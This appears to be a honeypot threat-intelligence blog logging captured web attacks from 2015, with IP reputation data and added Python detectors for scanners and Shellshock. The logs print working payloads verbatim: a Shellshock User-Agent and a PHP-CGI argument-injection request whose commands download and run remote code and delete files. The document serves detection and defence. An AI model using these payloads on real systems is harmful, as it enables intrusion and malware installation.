Sunday, 29 November 2015

46.105.8.133 - Scanning host via Python-urllib

BEGIN OF HTTP DATA:
2015-11-29 11:01:38
Source IP: 46.105.8.133
GET / HTTP/1.1
Accept-Encoding: identity
Host: 109.234.106.8:8080
Connection: close
User-Agent: Python-urllib/2.7


 END OF DATA
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
GET / HTTP/1.1
GET /script HTTP/1.1
GET /jenkins/script HTTP/1.1
GET /hudson/script HTTP/1.1
GET /login HTTP/1.1
GET /jenkins/login HTTP/1.1
GET /hudson/login HTTP/1.1
GET /jmx-console HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /manager/html HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
GET /msd HTTP/1.1
GET /mySqlDumper HTTP/1.1
GET /msd1.24stable HTTP/1.1
GET /msd1.24.4 HTTP/1.1
GET /mysqldumper HTTP/1.1
GET /MySQLDumper HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /phpmyadmin HTTP/1.1
GET /phpMyAdmin HTTP/1.1
GET /mysql HTTP/1.1
GET /sql HTTP/1.1
GET /myadmin HTTP/1.1
GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1
GET /phpMyAdmin-4.2.1-english HTTP/1.1
GET / HTTP/1.1
GET /sqlite/main.php HTTP/1.1
GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
GET /SQLiteManager-1.2.4/main.php HTTP/1.1
GET /sqlitemanager/main.php HTTP/1.1
GET /SQlite/main.php HTTP/1.1
GET /SQLiteManager/main.php HTTP/1.1
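Added example, not code from the original post: the request list above is a textbook admin-panel sweep (DFind banner, Jenkins/Hudson script console, JBoss jmx-console, Tomcat manager, MySQLDumper, phpMyAdmin, SQLiteManager). This script groups such request lines into probe families and flags a session that hits several unrelated families, or that carries the DFind banner, as a scanner. The sample request lines are constructed from the capture; the family regexes and the function names are my own heuristics.

```python
import re
from collections import Counter

# Constructed sample modelled on the request list above (one request line each).
SAMPLE_REQUESTS = """GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1
GET / HTTP/1.1
GET /jenkins/script HTTP/1.1
GET /hudson/login HTTP/1.1
GET /jmx-console HTTP/1.1
GET /manager/html HTTP/1.1
GET /msd1.24stable HTTP/1.1
GET /phpMyAdmin-4.2.1-all-languages HTTP/1.1
GET /SQLiteManager-1.2.4/main.php HTTP/1.1""".splitlines()

# Probe families from the capture, matched on the lower-cased path; bare /login is left out as too common.
PROBE_FAMILIES = {
    "dfind":         r"^/w00tw00t\.at\.isc\.sans\.dfind",
    "jenkins":       r"^/(?:jenkins|hudson)/(?:script|login)$|^/script$",
    "jboss":         r"^/jmx-console",
    "tomcat":        r"^/manager/html",
    "mysqldumper":   r"^/(?:msd|mysqldumper)",
    "phpmyadmin":    r"^/(?:phpmyadmin|myadmin|mysql|sql)\b",
    "sqlitemanager": r"^/sqlite",
}
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")

def classify_path(path):
    """Return the probe family a request path belongs to, or None."""
    p = path.lower()
    for family, pattern in PROBE_FAMILIES.items():
        if re.match(pattern, p):
            return family
    return None

def summarize(request_lines):
    """Count hits per probe family; malformed request lines are skipped."""
    counts = Counter()
    for line in request_lines:
        m = REQUEST_LINE.match(line.strip())
        family = classify_path(m.group("path")) if m else None
        if family:
            counts[family] += 1
    return counts

def is_scanner(request_lines, user_agent="", min_families=3):
    """DFind banner, or one client probing several unrelated panels (a scripted client lowers the bar)."""
    counts = summarize(request_lines)
    if "dfind" in counts:
        return True
    scripted = user_agent.lower().startswith(("python-urllib", "python-requests", "curl", "wget"))
    return len(counts) >= (2 if scripted else min_families)
```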

46.105.8[.]133

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.105.8.133
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analysis the accessible site only showed an HTML page related to Google AdSense.
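Added example, not code from the original post: a small detector for the Shellshock trigger seen in the User-Agent above, plus extraction of the download URL and dropped file paths from the injected command so they can be blocked and hunted for. The header dictionaries are constructed from the capture (the malicious value is copied from it verbatim); the regexes and function names are my own.

```python
import re

# Shellshock trigger: an environment variable whose value starts with "() {",
# which vulnerable bash parsed as a function definition and then ran the rest.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;(?P<cmd>.*)", re.S)
URL = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s'\"&;|<>]*")

# Constructed sample built from the capture above. CGI exports every request
# header as HTTP_<NAME>, so any header, not only User-Agent, is a candidate.
SAMPLE_HEADERS = {
    "Host": "127.0.0.1",
    "User-Agent": "() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ "
                  "&& /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp "
                  "&& /bin/sh /tmp/S0.sh 0<&1 2>&1",
}
BENIGN_HEADERS = {"Host": "example.org", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}

def find_shellshock(headers):
    """Return [(header_name, injected_command)] for every header carrying the trigger."""
    hits = []
    for name, value in headers.items():
        m = SHELLSHOCK.search(value)
        if m:
            hits.append((name, m.group("cmd").strip()))
    return hits

def extract_iocs(command):
    """Pull download URLs and dropped paths out of the injected command, for blocking and hunting."""
    urls = sorted(set(URL.findall(command)))
    paths = sorted(set(re.findall(r"(?<!\S)/(?:tmp|share)/\S+", command)))
    return {"urls": urls, "paths": paths}
```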

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>

Sunday, 1 November 2015

5.39.251.4 - Backdoor.Perl.Shellbot.fj via trying.us.to (195.182.136.198)

BEGIN OF HTTP DATA:
2015-10-31 10:54:30
Source IP: 5.39.251.4
Country: GB RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
We have handled this sort of attack already in a previous blog post. The attack has not been seen since March.

195.182.136[.]198

    Static Source: GeoIP data
  • Country: Russian Federation
  • ASN: AS6858 Comlink Ltd
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/195.182.136.198
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/195.182.136.198

5.39.251[.]4

    Static Source: GeoIP data
  • Country: United Kingdom
  • ASN: AS30938 ahbr company limited
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/5.39.251.4
